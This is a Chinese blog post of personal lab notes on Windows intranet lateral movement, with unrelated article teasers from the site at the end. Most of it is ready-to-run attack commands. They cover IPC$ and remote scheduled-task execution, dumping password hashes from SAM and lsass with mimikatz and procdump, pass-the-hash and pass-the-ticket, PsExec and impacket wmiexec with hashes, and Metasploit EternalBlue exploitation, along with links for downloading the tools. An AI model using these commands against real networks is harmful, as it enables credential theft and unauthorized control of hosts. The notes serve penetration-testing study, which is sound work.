首页 > 其他分享 >内网横向移动

内网横向移动

时间:2023-10-03 21:12:42浏览次数:42  
标签:exe 横向 192.168 mimikatz https 162.140 移动 com

内网横向移动

常用Windows远程连接和相关命令

1.IPC
1)建立连接

net use \\192.168.162.140\ipc$ /user:Administrator hongrisec@2019

在命令行中输入

net use

查看当前连接
2)ipc$的利用条件
a)开启了139,445端口
b)管理员开启了默认共享
3)ipc$连接失败的原因
a)用户名密码错误
b)目标没有打开ipc$默认共享
c)不能成功连接目标的139,445端口
d)命令输入错误
2.使用windows自带的工具获取远程主机信息
1)dir命令

dir \\192.168.162.140\c$

2)tasklist命令

tasklist /S 192.168.162.151 /U administrator /P hongrisec@2019

解决:
3.计划任务
1)at命令
windows2008之前(实测win7可以)
查看目标系统时间

net time \\192.168.162.140

将文件复制到目标系统中

copy calc.bat \\192.168.162.140\c$

使用at创建计划任务

at \\192.168.162.140 时间 C:\calc.bat


清除at记录

at \\192.168.162.140 2 /delete

使用at远程执行命令后,先将执行结果写入本地文件夹中,然后远程读取

at \\192.168.162.140 时间 cmd.exe /c "ipconfig > C:/1.txt"
type \\192.168.162.140\c$\1.txt

at \\192.168.162.140 3 /delete

2)schtasks命令(失败,出现找不到网络路径)
windows2008之后
在远程主机上创建一个名称为test的计划任务,在开机时启动,启动程序为c盘下的calc.bat,启动权限为system

schtasks /create /s 192.168.162.140 /tn test /sc onstart /tr c:\calc.bat /ru system /f

执行如下命令运行计划任务

schtasks /run /s 192.168.162.140 /i /tn "test"

Windows系统散列值获取分析与防范

1.GetPass
链接:https://pan.baidu.com/s/1pFP_NvUDtY25BxAMpeDbtg?pwd=yjy9
提取码:yjy9

2.PwDump7
下载https://github.com/Seabreg/pwdump

然后暴力破解
https://crackstation.net/

3.QuarksPwDump
下载https://github.com/tuthimi/quarkspwdump/blob/master/Release/QuarksPwDump.exe
使用

QuarksPwDump.exe --dump-hash-local


然后暴力破解
https://crackstation.net/
4.通过SAM和System文件抓取密码
导出SAM和System文件

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv


使用mimikatz读取
下载
链接:https://pan.baidu.com/s/1Ve_U3EhOEtgjBXCKfzFIOw?pwd=l4v9
提取码:l4v9
解析

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit 


5.使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit


或者

mimikatz.exe "privilege::debug" "log" "sekurlsa:logonpasswords" exit


6.使用mimikatz离线读取lsass.dmp文件
下载procdump
链接:https://pan.baidu.com/s/1974E3pe0JYYiksSsLIeZLQ?pwd=4njp
提取码:4njp
先把procdump.exe上传到受害机,然后导出lsass.dmp传回攻击机

procdump.exe -accepteula -ma lsass.exe lsass.dmp

攻击机中运行

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

哈希传递攻击(需要本地管理员权限)

注意执行dir访问远程主机时要用主机名,不能用ip地址
实战中是通过mimikatz获得同一个域的其他主机的hash值,然后利用哈希传递进行控制其他的主机
1.利用NTLM Hash进行哈希传递
受害机信息:
域名:STU1
ip:192.168.162.140
用户名:administrator
NTLM Hash:8a963371a63944419ec1adf687bb1be5

在攻击机中执行,会弹出一个新的cmd.exe

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:STU1 /ntlm:8a963371a63944419ec1adf687bb1be5" exit


可以将木马放到远程主机里
2.利用AES-256进行哈希传递
受害机信息:
域名:god
ip:192.168.162.140
用户名:stu1$
AES-256密钥:b9bb565bc987b5319903462cfff7249bcf530b719c7e4e0077bd5cb133eadaf7
在受害机中抓取AES-256密钥

mimikatz "privilege::debug" "sekurlsa::ekeys" exit


在攻击机中

mimikatz "privilege::debug" "sekurlsa::pth /user:stu1$ /domain:god /aes256:b9bb565bc987b5319903462cfff7249bcf530b719c7e4e0077bd5cb133eadaf7" exit


但这样还是不能进行访问远程主机,还得安装kb2871997补丁,在安装了kb2871997补丁后,常规的的哈希传递方法无法进行横向移动,但Administrator账号除外(SID为500)
创建一个快照,然后安装补丁https://www.microsoft.com/zh-tw/download/details.aspx?id=42722
查看sid值

whoami /user
wmic useraccount get name,sid

票据传递攻击(不需要本地管理员权限)(环境没搭建好)

1.使用mimikatz进行票据传递
将内存中的票据导出

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt,cifs,ldap等
使用mimikatz清除内存中的票据

kerberos::purge

将票据文件注入内存
2.使用kekeo进行票据传递

PsExec的使用

利用445端口的smb协议
1)PsTools
下载https://download.sysinternals.com/files/PSTools.zip
在有ipc$的情况下建立system权限的交互式shell,如果没有-s的话会建立administrator权限的shell

PsExec.exe -accepteula \\192.168.162.140 -s cmd.exe


如果没有ipc$的话(这个实验失败了)

PsExec.exe -accepteula \\192.168.162.140 -u administrator -p hongrisec@2019 cmd.exe

注意:
需要远程系统开启admin$共享(默认是开启的)
在使用ipc$连接目标系统后,不需要输入账号密码了
2)msf中的psexec
一般有两个模块
exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh(powershell版本)

use exploit/windows/smb/psexec
set rhost 192.168.162.140
set smbuser administrator
set smbpass hongrisec@2019
run


3)进行哈希传递攻击
下载 https://github.com/maaaaz/impacket-examples-windows(这个和pstools有些不同)
受害机信息:
域名:STU1
ip:192.168.162.140
用户名:administrator
NTLM Hash:8a963371a63944419ec1adf687bb1be5
那一串0可以省略,这样可以直接拿shell,方便些

psexec.exe -hashes 00000000000000000000000000000000:8a963371a63944419ec1adf687bb1be5 [email protected]


如果已知明文密码,目前还是很疑惑密码中的@

psexec.exe Administrator:hongrisec@[email protected]


如果在域中的话

psexec.exe god/Administrator:hongrisec@[email protected]

WMI的使用

需要135端口开放
1)基础使用

wmic /node:192.168.162.140 /user:administrator /password:hongrisec@2019 process call create "cmd.exe /c ipconfig > ip.txt"

2)进行哈希传递攻击
下载 https://github.com/maaaaz/impacket-examples-windows(书接psexec)
受害机信息:
域名:STU1
ip:192.168.162.140
用户名:administrator
NTLM Hash:8a963371a63944419ec1adf687bb1be5
那一串0可以省略,这样可以直接拿shell,方便些

wmiexec.exe -hashes 00000000000000000000000000000000:8a963371a63944419ec1adf687bb1be5 [email protected]

永恒之蓝漏洞

检测永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.162.0/24
set threads 50
run


利用永恒之蓝漏洞

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.162.140

RDP服务哈希传递

单独写了个博客
https://www.cnblogs.com/thebeastofwar/p/17720118.html

标签:exe,横向,192.168,mimikatz,https,162.140,移动,com
From: https://www.cnblogs.com/thebeastofwar/p/17726487.html

相关文章

  • 剪切移动并覆盖如何找回
    USB连接剪切一遍视频后,USB卡顿仍显示视频在手机中,再次剪切选了移动并替换,之后文件变0kb猜测是手机上剪切后已经没有文件只卡顿有文件名1.剪切覆盖在Diskgenius中扫描不到,不知道删除掉0kb再扫描会不会有效果,但0kb文件同样有Hex值,或许可以比对文件头尾2.网上搜索覆盖无法修复,但......
  • python提取论文图片波形数据:pyautogui键盘移动鼠标,跨模块全局变量使用,cv2局部放大窗口
    最近写了一个python提取论文图片波形数据的脚本,代码如下。涉及新知识点:pyautogui键盘移动鼠标,跨模块全局变量使用,cv2局部放大窗口,matplotlib图片在pyQT5lable显示,坐标变换,多线程同时使用。搜索相关关键字去对应代码区看注释就可以了。gui窗口:1#-*-coding:utf-8-*-2......
  • 【RuoYi移动端】uni-app中通过vuex的store来实现全局变量的修改和读取
    一、在store文件中新建csjVar.js文件constcsjVar={csjMess:[{aaa:"ok"},{bbb:"no"}]}exportdefaultcsjVar二、修改store文件中新建index.js文件importVuefrom'vue'importVuexfrom'vuex'importuserfrom'@/store/modules/user�......
  • 2023-09-30:用go语言,给你一个整数数组 nums 和一个整数 k 。 nums 仅包含 0 和 1, 每一
    2023-09-30:用go语言,给你一个整数数组nums和一个整数k。nums仅包含0和1,每一次移动,你可以选择相邻两个数字并将它们交换。请你返回使nums中包含k个连续1的最少交换次数。输入:nums=[1,0,0,1,0,1],k=2。输出:1。来自左程云。答案2023-09-30:步骤描述:1.......
  • UnimList1玩6了_基本上移动端就解决了一大半的问题(66)
    <divstyle="width:250px;box-shadow:04px8px0rgba(0,0,0,0.2),06px20px0rgba(0,0,0,0.19);text-align:center;"><divstyle="background-color:#4caf50;color:#fff;padding:10px;font-size:40px;"><h......
  • 第十一节 移动web
    移动Web第一天目标:使用位移、缩放、旋转、渐变效果丰富网页元素的呈现方式。01-平面转换简介作用:为元素添加动态效果,一般与过渡配合使用概念:改变盒子在平面内的形态(位移、旋转、缩放、倾斜)平面转换也叫2D转换,属性是transform平移transform:translate(X轴移动距离......
  • 怎么保护苹果手机移动应用程序ios ipa文件中的代码?
    ​目录              前言          代码混淆步骤1.选择要混淆保护的ipa文件2.选择要混淆的类名称3.选择要混淆保护的函数,方法4.配置签名证书5.混淆和测试运行 前言在当今移动应用市场竞争激烈的环境中,代码保护功......
  • 基于Java开发的企事业移动培训考学系统
    一、前言:随着移动技术的飞速发展,企事业培训考试系统也面临着不断的升级和改进。为了更好地满足用户的需求,本文将介绍一款企事业移动培训考学系统,并围绕该系统的功能、特点、应用场景等方面进行详细阐述。二、系统功能企事业移动培训考学系统具有丰富多样的功能,可以满足不同用......
  • vue3项目封装支持搜索,选中不可选,选中的数据项支持上下移动,删除的上下穿梭的树状穿梭框
     1,vue3代码1//这个是返回的所有的数据2constsourceItems=ref([])3//这是穿梭到下面的数据4consttargetItems=ref([])5//这是搜索字段6constsearchName=ref('')7//这两个要是后端返回,可不写8constex......
  • windows使用git bash 无法交互键盘上下键移动选择选项的解决方法
    windows使用gitbash无法交互键盘上下键移动选择选项的解决方法 来源1、直接通过数字键来选择我们看到的效果是这样的,>这个右尖括号指向的是第一条。我们如果想选择node-sass,我们可以输入2,并回车来选中。如果想选择Default(Vue3Preview)([Vue3]bable,eslint),我们......